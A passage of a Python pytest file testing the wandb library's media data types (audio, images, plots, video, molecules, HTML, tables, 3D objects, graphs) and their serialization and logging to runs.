    """captions: all set -> list; none set -> False; some set -> '' fill."""
    audio = np.random.uniform(-1, 1, 44100)
    sample_rate = 44100
    caption1 = "This is what a dog sounds like"
    caption2 = "This is what a chicken sounds like"
    # test with all captions
    wbaudio1 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption1)
    wbaudio2 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption2)
    assert wandb.Audio.captions([wbaudio1, wbaudio2]) == [caption1, caption2]
    # test with no captions
    wbaudio3 = wandb.Audio(audio, sample_rate=sample_rate)
    wbaudio4 = wandb.Audio(audio, sample_rate=sample_rate)
    assert wandb.Audio.captions([wbaudio3, wbaudio4]) is False
    # test with some captions
    wbaudio5 = wandb.Audio(audio, sample_rate=sample_rate)
    wbaudio6 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption2)
    assert wandb.Audio.captions([wbaudio5, wbaudio6]) == ["", caption2]
def test_audio_to_json(mocked_run):
    """Bound audio serializes with rate/duration metadata and a real file."""
    audio = np.zeros(44100)
    audioObj = wandb.Audio(audio, sample_rate=44100)
    audioObj.bind_to_run(mocked_run, "test", 0)
    meta = wandb.Audio.seq_to_json([audioObj], mocked_run, "test", 0)
    assert os.path.exists(os.path.join(mocked_run.dir, meta["audio"][0]["path"]))
    meta_expected = {
        "_type": "audio",
        "count": 1,
        "sampleRates": [44100],
        "durations": [1.0],
    }
    assert utils.subdict(meta, meta_expected) == meta_expected
    audio_expected = {
        "_type": "audio-file",
        "caption": None,
        "size": 88244,  # WAV file size for 1s of 16-bit mono at 44.1kHz
    }
    assert utils.subdict(meta["audio"][0], audio_expected) == audio_expected
    wandb.finish()


def test_audio_refs():
    """Audio built from a URL reference serializes without a local size."""
    audioObj = wandb.Audio(
        "https://wandb-artifacts-refs-public-test.s3-us-west-2.amazonaws.com/StarWars3.wav"
    )
    art = wandb.Artifact("audio_ref_test", "dataset")
    art.add(audioObj, "audio_ref")
    audio_expected = {
        "_type": "audio-file",
        "caption": None,
    }
    assert utils.subdict(audioObj.to_json(art), audio_expected) == audio_expected
def test_guess_mode():
    """A 3-channel array is interpreted as an RGB image."""
    image = np.random.randint(255, size=(28, 28, 3))
    wbimg = wandb.Image(image)
    assert wbimg.image.mode == "RGB"


def test_pil():
    """A PIL image passes through with identical pixel data."""
    pil = PIL.Image.new("L", (28, 28))
    img = wandb.Image(pil)
    assert list(img.image.getdata()) == list(pil.getdata())


def test_matplotlib_image():
    """A pyplot figure renders at matplotlib's default 640px width."""
    plt.plot([1, 2, 2, 4])
    img = wandb.Image(plt)
    assert img.image.width == 640
def test_matplotlib_image_with_multiple_axes():
    """Ensures that wandb.Image constructor can accept a pyplot or figure
    reference in which the figure has multiple axes. Importantly, there is
    no requirement that any of the axes have plotted data.
    """
    for fig in utils.matplotlib_multiple_axes_figures():
        wandb.Image(fig)  # this should not error.
    for fig in utils.matplotlib_multiple_axes_figures():
        # Pass the pyplot module (current figure) rather than the figure.
        wandb.Image(plt)  # this should not error.


@pytest.mark.skipif(
    sys.version_info >= (3, 9), reason="plotly doesn't support py3.9 yet"
)
def test_matplotlib_plotly_with_multiple_axes():
    """Ensures that wandb.Plotly constructor can accept a plotly figure
    reference in which the figure has multiple axes. Importantly, there is
    no requirement that any of the axes have plotted data.
    """
    for fig in utils.matplotlib_multiple_axes_figures():
        wandb.Plotly(fig)  # this should not error.
    for fig in utils.matplotlib_multiple_axes_figures():
        wandb.Plotly(plt)  # this should not error.
def test_plotly_from_matplotlib_with_image():
    """Ensures that wandb.Plotly constructor properly errors when
    a pyplot with image is passed
    """
    # try the figure version
    fig = utils.matplotlib_with_image()
    with pytest.raises(ValueError):
        wandb.Plotly(fig)
    plt.close()
    # try the plt version
    fig = utils.matplotlib_with_image()
    with pytest.raises(ValueError):
        wandb.Plotly(plt)
    plt.close()


def test_image_from_matplotlib_with_image():
    """Ensures that wandb.Image constructor supports a pyplot with image is passed"""
    # try the figure version
    fig = utils.matplotlib_with_image()
    wandb.Image(fig)  # this should not error.
    plt.close()
    # try the plt version
    fig = utils.matplotlib_with_image()
    wandb.Image(plt)  # this should not error.
    plt.close()
@pytest.mark.skipif(
    sys.version_info >= (3, 9), reason="plotly doesn't support py3.9 yet"
)
def test_make_plot_media_from_matplotlib_without_image():
    """Ensures that wand.Plotly.make_plot_media() returns a Plotly object when
    there is no image
    """
    fig = utils.matplotlib_without_image()
    assert type(wandb.Plotly.make_plot_media(fig)) == wandb.Plotly
    plt.close()
    fig = utils.matplotlib_without_image()
    assert type(wandb.Plotly.make_plot_media(plt)) == wandb.Plotly
    plt.close()


def test_make_plot_media_from_matplotlib_with_image():
    """Ensures that wand.Plotly.make_plot_media() returns an Image object when
    there is an image in the matplotlib figure
    """
    fig = utils.matplotlib_with_image()
    assert type(wandb.Plotly.make_plot_media(fig)) == wandb.Image
    plt.close()
    fig = utils.matplotlib_with_image()
    assert type(wandb.Plotly.make_plot_media(plt)) == wandb.Image
    plt.close()
def test_create_bokeh_plot(mocked_run):
    """Ensures that wandb.Bokeh constructor accepts a bokeh plot"""
    bp = dummy_data.bokeh_plot()
    bp = wandb.data_types.Bokeh(bp)
    bp.bind_to_run(mocked_run, "bokeh", 0)


@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_gif(mocked_run):
    """A 4-D (frames, channels, H, W) array encodes to gif on request."""
    video = np.random.randint(255, size=(10, 3, 28, 28))
    vid = wandb.Video(video, format="gif")
    vid.bind_to_run(mocked_run, "videos", 0)
    assert vid.to_json(mocked_run)["path"].endswith(".gif")


@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_mp4(mocked_run):
    """A 4-D array encodes to mp4 on request."""
    video = np.random.randint(255, size=(10, 3, 28, 28))
    vid = wandb.Video(video, format="mp4")
    vid.bind_to_run(mocked_run, "videos", 0)
    assert vid.to_json(mocked_run)["path"].endswith(".mp4")


@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_multi(mocked_run):
    """A 5-D (batch, frames, channels, H, W) array defaults to gif."""
    video = np.random.random(size=(2, 10, 3, 28, 28))
    vid = wandb.Video(video)
    vid.bind_to_run(mocked_run, "videos", 0)
    assert vid.to_json(mocked_run)["path"].endswith(".gif")


@pytest.mark.skipif(sys.version_info < (3, 6), reason="No moviepy.editor in py2")
def test_video_numpy_invalid():
    """A 3-D array is not a valid video payload and must raise."""
    video = np.random.random(size=(3, 28, 28))
    with pytest.raises(ValueError):
        wandb.Video(video)


def test_video_path(mocked_run):
    """A .mp4 file path is accepted; serialized path keeps the extension."""
    # NOTE(review): writes into the cwd (no isolated filesystem here).
    with open("video.mp4", "w") as f:
        f.write("00000")
    vid = wandb.Video("video.mp4")
    vid.bind_to_run(mocked_run, "videos", 0)
    assert vid.to_json(mocked_run)["path"].endswith(".mp4")


def test_video_path_invalid(runner):
    """An unsupported container extension (.avi) must raise ValueError."""
    with runner.isolated_filesystem():
        with open("video.avi", "w") as f:
            f.write("00000")
        with pytest.raises(ValueError):
            wandb.Video("video.avi")
def test_molecule(mocked_run):
    """A .pdb file path is accepted and serialized to the run dir."""
    with open("test.pdb", "w") as f:
        f.write("00000")
    mol = wandb.Molecule("test.pdb")
    mol.bind_to_run(mocked_run, "rad", "summary")
    wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
    assert os.path.exists(mol._path)
    wandb.finish()


def test_molecule_file(mocked_run):
    """An open file handle to a .pdb is accepted as well."""
    with open("test.pdb", "w") as f:
        f.write("00000")
    mol = wandb.Molecule(open("test.pdb", "r"))
    mol.bind_to_run(mocked_run, "rad", "summary")
    wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
    assert os.path.exists(mol._path)
    wandb.finish()


def test_molecule_from_smiles(mocked_run):
    """Ensures that wandb.Molecule.from_smiles supports valid SMILES molecule string representations"""
    mol = wandb.Molecule.from_smiles("CC(=O)Nc1ccc(O)cc1")
    mol.bind_to_run(mocked_run, "rad", "summary")
    wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
    assert os.path.exists(mol._path)
    wandb.finish()


def test_molecule_from_invalid_smiles(mocked_run):
    """Ensures that wandb.Molecule.from_smiles errs if passed an invalid SMILES string"""
    with pytest.raises(ValueError):
        wandb.Molecule.from_smiles("TEST")
    wandb.finish()


def test_molecule_from_rdkit_mol_object(mocked_run):
    """Ensures that wandb.Molecule.from_rdkit supports rdkit.Chem.rdchem.Mol objects"""
    mol = wandb.Molecule.from_rdkit(rdkit.Chem.MolFromSmiles("CC(=O)Nc1ccc(O)cc1"))
    mol.bind_to_run(mocked_run, "rad", "summary")
    wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
    assert os.path.exists(mol._path)
    wandb.finish()


def test_molecule_from_rdkit_mol_file(mocked_run):
    """Ensures that wandb.Molecule.from_rdkit supports .mol files"""
    substance = rdkit.Chem.MolFromSmiles("CC(=O)Nc1ccc(O)cc1")
    mol_file_name = "test.mol"
    rdkit.Chem.rdmolfiles.MolToMolFile(substance, mol_file_name)
    mol = wandb.Molecule.from_rdkit(mol_file_name)
    mol.bind_to_run(mocked_run, "rad", "summary")
    wandb.Molecule.seq_to_json([mol], mocked_run, "rad", "summary")
    assert os.path.exists(mol._path)
    wandb.finish()


def test_molecule_from_rdkit_invalid_input(mocked_run):
    """Ensures that wandb.Molecule.from_rdkit errs on invalid input"""
    mol_file_name = "test"  # no recognized extension
    with pytest.raises(ValueError):
        wandb.Molecule.from_rdkit(mol_file_name)
    wandb.finish()
def test_html_str(mocked_run):
    """An HTML string binds to a run and lands on disk."""
    html = wandb.Html("<html><body><h1>Hello</h1></body></html>")
    html.bind_to_run(mocked_run, "rad", "summary")
    wandb.Html.seq_to_json([html], mocked_run, "rad", "summary")
    assert os.path.exists(html._path)
    wandb.finish()


def test_html_styles():
    """The wandb stylesheet is injected into <head> unless inject=False."""
    with CliRunner().isolated_filesystem():
        pre = (
            '<base target="_blank"><link rel="stylesheet" type="text/css" '
            'href="https://app.wandb.ai/normalize.css" />'
        )
        html = wandb.Html("<html><body><h1>Hello</h1></body></html>")
        assert (
            html.html
            == "<html><head>" + pre + "</head><body><h1>Hello</h1></body></html>"
        )
        html = wandb.Html("<html><head></head><body><h1>Hello</h1></body></html>")
        assert (
            html.html
            == "<html><head>" + pre + "</head><body><h1>Hello</h1></body></html>"
        )
        html = wandb.Html("<h1>Hello</h1>")
        assert html.html == pre + "<h1>Hello</h1>"
        html = wandb.Html("<h1>Hello</h1>", inject=False)
        assert html.html == "<h1>Hello</h1>"


def test_html_file(mocked_run):
    """An open file handle is accepted; duplicates serialize fine."""
    with open("test.html", "w") as f:
        f.write("<html><body><h1>Hello</h1></body></html>")
    html = wandb.Html(open("test.html"))
    html.bind_to_run(mocked_run, "rad", "summary")
    wandb.Html.seq_to_json([html, html], mocked_run, "rad", "summary")
    assert os.path.exists(html._path)


def test_html_file_path(mocked_run):
    """A file path string is accepted as HTML input."""
    with open("test.html", "w") as f:
        f.write("<html><body><h1>Hello</h1></body></html>")
    html = wandb.Html("test.html")
    html.bind_to_run(mocked_run, "rad", "summary")
    wandb.Html.seq_to_json([html, html], mocked_run, "rad", "summary")
    assert os.path.exists(html._path)
def test_table_default():
    """Default table columns are Input/Output/Expected."""
    table = wandb.Table()
    table.add_data("Some awesome text", "Positive", "Negative")
    assert table._to_table_json() == {
        "data": [["Some awesome text", "Positive", "Negative"]],
        "columns": ["Input", "Output", "Expected"],
    }
def test_table_eq_debug():
    """_eq_debug raises AssertionError for each kind of table mismatch."""
    # Invalid Type
    a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    b = {}
    with pytest.raises(AssertionError):
        a._eq_debug(b, True)
    assert a != b
    # Mismatch Rows
    a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    b = wandb.Table(data=[[1, 2, 3]])
    with pytest.raises(AssertionError):
        a._eq_debug(b, True)
    assert a != b
    # Mismatch Columns
    a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    b = wandb.Table(data=[[1, 2, 3], [4, 5, 6]], columns=["a", "b", "c"])
    with pytest.raises(AssertionError):
        a._eq_debug(b, True)
    assert a != b
    # Mismatch Types
    a = wandb.Table(data=[[1, 2, 3]])
    b = wandb.Table(data=[["1", "2", "3"]])
    with pytest.raises(AssertionError):
        a._eq_debug(b, True)
    assert a != b
    # Mismatch Data
    a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    b = wandb.Table(data=[[1, 2, 3], [4, 5, 100]])
    with pytest.raises(AssertionError):
        a._eq_debug(b, True)
    assert a != b
    # Identical tables compare equal and _eq_debug passes silently.
    a = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    b = wandb.Table(data=[[1, 2, 3], [4, 5, 6]])
    a._eq_debug(b, True)
    assert a == b
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_table_custom():
    """Custom columns via add_data/add_row match a DataFrame-built table."""
    import pandas as pd

    table = wandb.Table(["Foo", "Bar"])
    table.add_data("So", "Cool")
    table.add_row("&", "Rad")  # legacy alias for add_data
    assert table._to_table_json() == {
        "data": [["So", "Cool"], ["&", "Rad"]],
        "columns": ["Foo", "Bar"],
    }
    df = pd.DataFrame(columns=["Foo", "Bar"], data=[["So", "Cool"], ["&", "Rad"]])
    table_df = wandb.Table(dataframe=df)
    assert table._to_table_json() == table_df._to_table_json()
# Point-cloud fixtures: 4 columns (xyz + category), 3 columns (bare xyz),
# and 6 columns (xyz + rgb) respectively.
point_cloud_1 = np.array([[0, 0, 0, 1], [0, 0, 1, 13], [0, 1, 0, 2], [0, 1, 0, 4]])
point_cloud_2 = np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 0]])
point_cloud_3 = np.array(
    [
        [0, 0, 0, 100, 100, 100],
        [0, 0, 1, 100, 100, 100],
        [0, 1, 0, 100, 100, 100],
        [0, 1, 0, 100, 100, 100],
    ]
)
def test_object3d_numpy(mocked_run):
    """All three supported point-cloud column layouts serialize to object3D-file."""
    obj1 = wandb.Object3D(point_cloud_1)
    obj2 = wandb.Object3D(point_cloud_2)
    obj3 = wandb.Object3D(point_cloud_3)
    obj1.bind_to_run(mocked_run, "object3d", 0)
    obj2.bind_to_run(mocked_run, "object3d", 1)
    obj3.bind_to_run(mocked_run, "object3d", 2)
    assert obj1.to_json(mocked_run)["_type"] == "object3D-file"
    assert obj2.to_json(mocked_run)["_type"] == "object3D-file"
    assert obj3.to_json(mocked_run)["_type"] == "object3D-file"


def test_object3d_dict(mocked_run):
    """A dict payload with a recognized "type" serializes to object3D-file."""
    obj = wandb.Object3D({"type": "lidar/beta",})
    obj.bind_to_run(mocked_run, "object3D", 0)
    assert obj.to_json(mocked_run)["_type"] == "object3D-file"
    wandb.finish()
def test_object3d_dict_invalid(mocked_run):
    """A dict with an unknown "type" must raise ValueError."""
    with pytest.raises(ValueError):
        # Unused `obj =` binding removed: the assignment never completes.
        wandb.Object3D({"type": "INVALID",})
    wandb.finish()


def test_object3d_dict_invalid_string(mocked_run):
    """A string that is neither a path nor supported payload must raise."""
    with pytest.raises(ValueError):
        wandb.Object3D("INVALID")
    wandb.finish()
def test_object3d_obj(mocked_run):
    """A .obj file handle serializes to object3D-file."""
    obj = wandb.Object3D(utils.fixture_open("cube.obj"))
    obj.bind_to_run(mocked_run, "object3D", 0)
    assert obj.to_json(mocked_run)["_type"] == "object3D-file"
    wandb.finish()


def test_object3d_gltf(mocked_run):
    """A .gltf file handle serializes to object3D-file."""
    obj = wandb.Object3D(utils.fixture_open("Box.gltf"))
    obj.bind_to_run(mocked_run, "object3D", 0)
    assert obj.to_json(mocked_run)["_type"] == "object3D-file"
    wandb.finish()


def test_object3d_io(mocked_run):
    """An in-memory stream is accepted when file_type is given explicitly."""
    f = utils.fixture_open("Box.gltf")
    body = f.read()
    ioObj = six.StringIO(six.u(body))
    obj = wandb.Object3D(ioObj, file_type="obj")
    obj.bind_to_run(mocked_run, "object3D", 0)
    assert obj.to_json(mocked_run)["_type"] == "object3D-file"
    wandb.finish()


def test_object3d_unsupported_numpy():
    """Arrays with unsupported shapes, and typeless streams, must raise."""
    with pytest.raises(ValueError):
        wandb.Object3D(np.array([1]))
    with pytest.raises(ValueError):
        wandb.Object3D(np.array([[1, 2], [3, 4], [1, 2]]))
    with pytest.raises(ValueError):
        wandb.Object3D(np.array([1, 3, 4, 5, 6, 7, 8, 8, 3]))
    with pytest.raises(ValueError):
        wandb.Object3D(np.array([[1, 3, 4, 5, 6, 7, 8, 8, 3]]))
    # A stream without file_type cannot be classified.
    f = utils.fixture_open("Box.gltf")
    body = f.read()
    ioObj = six.StringIO(six.u(body))
    with pytest.raises(ValueError):
        wandb.Object3D(ioObj)
def test_object3d_seq_to_json(mocked_run):
    """seq_to_json writes every object's media file and lists filenames in order."""
    objs = [
        wandb.Object3D(utils.fixture_open("Box.gltf")),
        wandb.Object3D(utils.fixture_open("cube.obj")),
        wandb.Object3D(point_cloud_1),
    ]
    for o in objs:
        o.bind_to_run(mocked_run, "pc", 1)
    obj = wandb.Object3D.seq_to_json(objs, mocked_run, "pc", 1)
    box = obj["filenames"][0]
    cube = obj["filenames"][1]
    pts = obj["filenames"][2]
    assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", box))
    assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", cube))
    assert os.path.exists(os.path.join(mocked_run.dir, "media", "object3D", pts))
    assert obj["_type"] == "object3D"
    assert obj["filenames"] == [
        box,
        cube,
        pts,
    ]
    wandb.finish()
def test_table_init():
    """A data-only table gets the default Input/Output/Expected columns."""
    table = wandb.Table(data=[["Some awesome text", "Positive", "Negative"]])
    assert table._to_table_json() == {
        "data": [["Some awesome text", "Positive", "Negative"]],
        "columns": ["Input", "Output", "Expected"],
    }


# Shared rows for the table-construction tests below.
table_data = [
    ["a", 1, True],
    ["b", 2, False],
    ["c", 3, True],
]
def test_table_from_list():
    """Lists go through data=/rows=; positional or dataframe= misuse raises."""
    table = wandb.Table(data=table_data)
    assert table.data == table_data
    with pytest.raises(AssertionError):
        # raises when user accidentally overrides columns
        table = wandb.Table(table_data)
    with pytest.raises(AssertionError):
        # raises when user uses list in "dataframe"
        table = wandb.Table(dataframe=table_data)
    # legacy
    table = wandb.Table(rows=table_data)
    assert table.data == table_data


def test_table_iterator():
    """iterrows yields (index, row); an empty table yields nothing."""
    table = wandb.Table(data=table_data)
    for ndx, row in table.iterrows():
        assert row == table_data[ndx]
    table = wandb.Table(data=[])
    assert len([(ndx, row) for ndx, row in table.iterrows()]) == 0


def test_table_from_numpy():
    """ndarray input is converted to nested lists; misuse raises."""
    np_data = np.array(table_data)
    table = wandb.Table(data=np_data)
    assert table.data == np_data.tolist()
    with pytest.raises(AssertionError):
        # raises when user accidentally overrides columns
        table = wandb.Table(np_data)
    with pytest.raises(AssertionError):
        # raises when user uses list in "dataframe"
        table = wandb.Table(dataframe=np_data)
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_table_from_pandas():
    """DataFrames work via data= or the legacy dataframe= keyword."""
    import pandas as pd

    pd_data = pd.DataFrame(table_data)
    table = wandb.Table(data=pd_data)
    assert table.data == table_data
    with pytest.raises(AssertionError):
        # raises when user accidentally overrides columns
        table = wandb.Table(pd_data)
    # legacy
    table = wandb.Table(dataframe=pd_data)
    assert table.data == table_data
def test_graph():
    """Nodes and an edge serialize into the keras-format graph JSON."""
    graph = wandb.Graph()
    node_a = data_types.Node("a", "Node A", size=(4,))
    node_b = data_types.Node("b", "Node B", size=(16,))
    graph.add_node(node_a)
    graph.add_node(node_b)
    graph.add_edge(node_a, node_b)
    assert graph._to_graph_json() == {
        "edges": [["a", "b"]],
        "format": "keras",
        "nodes": [
            {"id": "a", "name": "Node A", "size": (4,)},
            {"id": "b", "name": "Node B", "size": (16,)},
        ],
    }


def test_numpy_arrays_to_list():
    """_numpy_arrays_to_lists converts ndarrays recursively, incl. inside dicts."""
    conv = _numpy_arrays_to_lists
    assert conv(np.array(1)) == [1]
    assert conv(np.array((1, 2,))) == [1, 2]
    assert conv([np.array((1, 2,))]) == [[1, 2]]
    assert conv(np.array(({"a": [np.array((1, 2,))]}, 3,))) == [{"a": [[1, 2]]}, 3]
def test_partitioned_table_from_json(runner, mock_server, api):
    """A PartitionedTable fetched from a mocked artifact iterates its rows."""
    # This is mocked to return some data
    art = api.artifact("entity/project/dummy:v0", type="dataset")
    ptable = art.get("dataset")
    data = [[0, 0, 1]]
    for ndx, row in ptable.iterrows():
        assert row == data[ndx]


def test_partitioned_table():
    """An unresolved PartitionedTable is empty; equality keys on parts_path."""
    partition_table = wandb.data_types.PartitionedTable(parts_path="parts")
    assert len([(ndx, row) for ndx, row in partition_table.iterrows()]) == 0
    assert partition_table == wandb.data_types.PartitionedTable(parts_path="parts")
    assert partition_table != wandb.data_types.PartitionedTable(parts_path="parts2")
def test_table_column_style():
    """Column-wise API: add_column/get_column/set_pk, numpy conversion, and
    foreign-key propagation across tables."""
    # Test Base Cases
    table1 = wandb.Table(columns=[], data=[])
    table1.add_column("number", [1, 2, 3])
    table1.add_data(4)
    # Column length must match the current row count.
    with pytest.raises(AssertionError):
        table1.add_column("strings", ["a"])
    table1.add_column("strings", ["a", "b", "c", "d"])
    table1.set_pk("strings")
    table1.add_data(5, "e")
    table1.add_column("np_numbers", np.array([101, 102, 103, 104, 105]))
    assert table1.data == [
        [1, "a", 101],
        [2, "b", 102],
        [3, "c", 103],
        [4, "d", 104],
        [5, "e", 105],
    ]
    assert table1.get_column("number") == [1, 2, 3, 4, 5]
    assert table1.get_column("strings") == ["a", "b", "c", "d", "e"]
    assert table1.get_column("np_numbers") == [101, 102, 103, 104, 105]
    assert np.all(
        table1.get_column("number", convert_to="numpy") == np.array([1, 2, 3, 4, 5])
    )
    assert np.all(
        table1.get_column("strings", convert_to="numpy")
        == np.array(["a", "b", "c", "d", "e"])
    )
    assert np.all(
        table1.get_column("np_numbers", convert_to="numpy")
        == np.array([101, 102, 103, 104, 105])
    )
    ndxs = table1.get_index()
    assert ndxs == [0, 1, 2, 3, 4]
    # Fixed: previously asserted a non-empty list comprehension, which is
    # always truthy; now actually checks every index's back-reference.
    assert all(ndx._table == table1 for ndx in ndxs)
    # Test More Images and ndarrays
    rand_1 = np.random.randint(255, size=(32, 32))
    rand_2 = np.random.randint(255, size=(32, 32))
    rand_3 = np.random.randint(255, size=(32, 32))
    img_1 = wandb.Image(rand_1)
    img_2 = wandb.Image(rand_2)
    img_3 = wandb.Image(rand_3)
    table2 = wandb.Table(columns=[], data=[])
    table2.add_column("np_data", [rand_1, rand_2])
    table2.add_column("image", [img_1, img_2])
    table2.add_data(rand_3, img_3)
    assert table2.data == [[rand_1, img_1], [rand_2, img_2], [rand_3, img_3]]
    assert np.all(
        table2.get_column("np_data", convert_to="numpy")
        == np.array([rand_1, rand_2, rand_3])
    )
    assert table2.get_column("image") == [img_1, img_2, img_3]
    # Dead locals `a`/`b` removed: both expressions are re-evaluated in the
    # assert below, so the bindings were never used.
    assert np.all(
        table2.get_column("image", convert_to="numpy")
        == np.array([rand_1, rand_2, rand_3])
    )
    table3 = wandb.Table(columns=[], data=[])
    table3.add_column("table1_fk", table1.get_column("strings"))
    # Foreign-key cells keep a reference back to the source table.
    assert table3.get_column("table1_fk")[0]._table == table1
def test_ndarrays_in_tables():
    """NDArrayType columns enforce a fixed element shape on add_data/cast."""
    rows = 10
    d = 128
    c = 3
    nda_table = wandb.Table(
        columns=["ndarray"], data=np.random.randint(255, size=(rows, 1, d, d, c))
    )
    # Same-shape arrays (or equivalent nested lists) are accepted.
    nda_table.add_data(np.random.randint(255, size=(d, d, c)))
    nda_table.add_data(np.random.randint(255, size=(d, d, c)).tolist())
    # Shape mismatch must be rejected.
    with pytest.raises(TypeError):
        nda_table.add_data(np.random.randint(255, size=(d + 1, d, c)))
    with pytest.raises(TypeError):
        nda_table.add_data(np.random.randint(255, size=(d + 1, d, c)).tolist())
    assert any(
        [
            isinstance(t, wandb.data_types._dtypes.NDArrayType)
            for t in nda_table._column_types.params["type_map"]["ndarray"].params[
                "allowed_types"
            ]
        ]
    )
    # Mixed lists/arrays start out as a ListType column...
    nda_table = wandb.Table(columns=[], data=[])
    nda_table.add_column(
        "odd_col",
        [[[i], [i]] for i in range(rows)] + [np.random.randint(255, size=(2, 1))],
    )
    assert isinstance(
        nda_table._column_types.params["type_map"]["odd_col"],
        wandb.data_types._dtypes.ListType,
    )
    # ...and can be explicitly cast to a fixed-shape NDArrayType.
    nda_table.cast("odd_col", wandb.data_types._dtypes.NDArrayType(shape=(2, 1)))
    nda_table.add_data(np.random.randint(255, size=(2, 1)))
    nda_table.add_data(np.random.randint(255, size=(2, 1)).tolist())
    with pytest.raises(TypeError):
        nda_table.add_data(np.random.randint(255, size=(2, 2)))
    with pytest.raises(TypeError):
        nda_table.add_data(np.random.randint(255, size=(2, 2)).tolist())
    assert isinstance(
        nda_table._column_types.params["type_map"]["odd_col"],
        wandb.data_types._dtypes.NDArrayType,
    )
def test_table_logging(mocked_run, live_mock_server, test_settings, api):
run = wandb.init(settings=test_settings)
run.log(
{
"logged_table": wandb.Table(
columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],
)
}
)
run.finish()
assert True
def test_reference_table_logging(mocked_run, live_mock_server, test_settings, api):
    """Logging the same table twice must work on both old and new servers."""
    # Exercise the same scenario against a pre- and post-reference-support
    # server version (the 0.10.x path lacks table-reference support).
    for max_cli_version in ("0.10.33", "0.11.0"):
        live_mock_server.set_ctx({"max_cli_version": max_cli_version})
        run = wandb.init(settings=test_settings)
        t = wandb.Table(columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],)
        run.log({"logged_table": t})
        run.log({"logged_table": t})
        run.finish()
        assert True
def test_reference_table_artifacts(mocked_run, live_mock_server, test_settings, api):
    """Adding one table to two successive artifacts of the same name must not error."""
    live_mock_server.set_ctx({"max_cli_version": "0.11.0"})
    run = wandb.init(settings=test_settings)
    t = wandb.Table(columns=["a"], data=[[wandb.Image(np.ones(shape=(32, 32)))]],)
    # The second artifact version should reference the table stored by the first.
    for _ in range(2):
        art = wandb.Artifact("A", "dataset")
        art.add(t, "table")
        run.log_artifact(art)
    run.finish()
    assert True


# TODO: In another location: need to manually test the internal/backend
# artifact sender with an artifact that has a reference to be resolved - i
# think this will get the most coverage
def test_table_reference(runner, live_mock_server, test_settings):
    """A table fetched out of a used artifact can be re-logged to a new run."""
    with runner.isolated_filesystem():
        run = wandb.init(settings=test_settings)
        source_artifact = run.use_artifact("dummy:v0")
        fetched_table = source_artifact.get("parts/1")
        run.log({"table": fetched_table})
        run.finish()
        assert True
def test_partitioned_table_logging(mocked_run, live_mock_server, test_settings, api):
    """Smoke test: a PartitionedTable can be logged directly to a run."""
    run = wandb.init(settings=test_settings)
    partitioned = wandb.data_types.PartitionedTable("parts")
    run.log({"logged_table": partitioned})
    run.finish()
    assert True
def test_joined_table_logging(mocked_run, live_mock_server, test_settings, api):
    """A JoinedTable built from two artifact-added tables can itself be added and logged."""
    run = wandb.init(settings=test_settings)
    art = wandb.Artifact("A", "dataset")
    # Two single-row tables sharing the join key "id".
    t1, t2 = (
        wandb.Table(
            columns=["id", "a"], data=[[1, wandb.Image(np.ones(shape=(32, 32)))]],
        )
        for _ in range(2)
    )
    art.add(t1, "t1")
    art.add(t2, "t2")
    jt = wandb.JoinedTable(t1, t2, "id")
    art.add(jt, "jt")
    run.log_artifact(art)
    run.log({"logged_table": jt})
    run.finish()
    assert True
def test_fail_to_make_file(mocked_run):
    """Binding media under a key with invalid filename characters should raise on Windows."""
    wb_image = wandb.Image(image)
    try:
        # ":" is not a legal filename character on Windows; elsewhere it is fine.
        wb_image.bind_to_run(mocked_run, "my key: an identifier", 0)
        # On Windows the bind above must have raised, so reaching this point
        # there is a test failure.
        if platform.system() == "Windows":
            assert False
    except ValueError as e:
        assert " is invalid. Please remove invalid filename characters" in str(e)
def test_log_with_dir_sep_windows(live_mock_server, test_settings):
    """A forward slash in a media key is accepted on every platform."""
    run = wandb.init(settings=test_settings)
    run.log({"train/image": wandb.Image(image)})
    run.finish()
    assert True
def test_log_with_back_slash_windows(live_mock_server, test_settings):
    """A backslash in a media key raises on Windows and is accepted elsewhere.

    Fix: the key was spelled "train\image", which relies on the invalid escape
    sequence ``\i`` (a DeprecationWarning today, a SyntaxError in future
    CPython).  ``"train\\image"`` is byte-for-byte the same runtime string.
    """
    run = wandb.init(settings=test_settings)
    wb_image = wandb.Image(image)
    # windows doesnt allow a backslash in media keys right now
    if platform.system() == "Windows":
        with pytest.raises(ValueError):
            run.log({"train\\image": wb_image})
    else:
        run.log({"train\\image": wb_image})
    run.finish()
    assert True
# One instance of each media type that can be bound to a run; parametrized
# below to check that glob metacharacters in keys are escaped on publish.
runbindable_media = [
    wandb.Image(image, masks={"overlay": standard_mask}),
    wandb.data_types.ImageMask(
        {"mask_data": np.random.randint(0, 10, (300, 300))}, key="test"
    ),
    wandb.Table(data=[[1, 2, 3], [4, 5, 6]]),
    wandb.Graph(),
    wandb.Audio(np.random.uniform(-1, 1, 44100), sample_rate=44100),
]
@pytest.mark.parametrize("media", runbindable_media)
def test_media_keys_escaped_as_glob_for_publish(mocked_run, media):
    """Keys containing glob metacharacters must be escaped before publishing files."""
    weird_key = "[weirdkey]"
    media.bind_to_run(mocked_run, weird_key, 0)
    # Collect every glob handed to publish_files.  Each recorded call was made
    # with exactly one positional dict argument and no keyword arguments,
    # which the ([files_dict], []) destructuring enforces.
    published_globs = [
        g
        for (
            [files_dict],
